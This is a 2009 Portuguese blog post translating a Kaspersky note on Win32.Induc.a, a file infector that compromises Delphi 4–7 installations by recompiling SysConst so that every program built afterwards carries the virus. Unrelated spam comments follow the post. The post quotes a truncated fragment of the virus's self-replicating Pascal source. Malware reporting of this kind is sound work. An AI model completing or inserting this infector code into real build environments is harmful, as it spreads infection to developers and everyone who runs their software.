Induc, o File infector inovador

Posted: 17th August 2009 by silasjr in Artigos
Tags: , , ,
1,908

A kaspersky em nota informou sobre um novo tipo de file infector, o qual é direcionado para usuários Delphi, a Kaspersky ainda disse que este virus não leva risco para que não tenha o Delphi instalado, ao que tudo indica este file infector é direcionado apenas para desenvolvedores.

Leia abaixo nota da Kaspersky

Recentemente acrescentamos a detenção de um file infector os nossos bancos de dados, para algo que chamamos o Vírus. Win32. Induc.a. Desde então, tivemos uma grande carga de perguntas sobre ele. Ele não tem atualmente uma carga de praga maliciosa, e ele não infecciona diretamente arquivos.exe. Em vez disso, ele verifica se Delphi é instalado na máquina de vítima, procurando versões 4.0, 5.0, 6.0 e 7.0.

Se o malware realmente encontrar uma destas versões Delphi, ele copia SysConst.pas a \Lib e escreve-lhe o seu código. Ele então faz um apoio de SysConst.dcu, chamando-o SysConst.bak (dcu arquivos são guardados em \Lib). Ele então compila \Lib\SysConst.pas que dá uma versão infeccionada de SysConst.dcu. O arquivo.pas modificado é eliminado.
"uses windows;
var sc:array[1..24] of string=('uses windows; var sc:array[1..24] of string=(', 'function x(s:string):string;var i:integer;begin for i:=1 to length(s) do if s[i]',
'=#36 then s[i]:=#39;result:=s;end;procedure re(s,d,e:string);var f1,f2:textfile;', 'h:cardinal;f:STARTUPINFO;p:PROCESS_INFORMATION;b:boolean;t1,t2,t3:FILETIME;begin',
'h:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0);if h<>DWORD(-1) then begin CloseHandle', "

O resultado – qualquer programa Delphi compilado no computador é infeccionado. (Já tivemos uma companhia que em contato conosco para queixar-nos de algo que eles pensavam ser um positivo falso.) Talvez este determinado vírus não é tão a maior a ponto de uma ameaça: não é a primeira vez que vimos este método de propagação, o próprio código é primitivo, não há nenhuma outra carga paga, e há modos muito mais fáceis de infeccionar máquinas. Mas no passado vimos que as novas rotinas de infecção são apanhadas, torcidas, e tomadas além disso. Estaremos vigiando este, a título de prevenção

Nota traduzida por mim, link para o conteúdo original

  1. Felice Sigafoos says:
    17/01/2012 at 9:34 PM

    This is great information. Found this on stumbleupon.

  2. limousine car service says:
    17/01/2012 at 10:14 PM

    Hands down, Apple’s app store wins by a mile. It’s a huge selection of all sorts of apps vs a rather sad selection of a handful for Zune. Microsoft has plans, especially in the realm of games, but I’m not sure I’d want to bet on the future if this aspect is important to you. The iPod is a much better choice in that case.

  3. free samples by mail says:
    18/01/2012 at 8:00 AM

    I would like to show my admiration for your generosity for women who have the need for help on this important idea. Your real commitment to getting the solution all around was certainly advantageous and have continually empowered those just like me to reach their pursuits. This warm and helpful tutorial denotes a lot to me and a whole lot more to my peers. Thank you; from everyone of us.

  4. Aurea Coppenger says:
    19/01/2012 at 4:35 PM

    Hiya, I am really glad I have found this information. Today bloggers publish only about gossips and web and this is really irritating. A good web site with exciting content, this is what I need. Thank you for keeping this website, I will be visiting it. Do you do newsletters? Can’t find it.

  5. Hortensia says:
    20/01/2012 at 3:28 AM

    Absolutely love the new appear. I enjoyed this article. Credit for the good write.

  6. pizza ingredients says:
    20/01/2012 at 10:06 AM

    It’s hard to come across knowledgeable men and women on this subject, but you sound like you know what you are talking about! Thanks

  7. Jewel says:
    20/01/2012 at 10:12 AM

    Its superb as your other posts : D, thanks for posting .

« Older Comments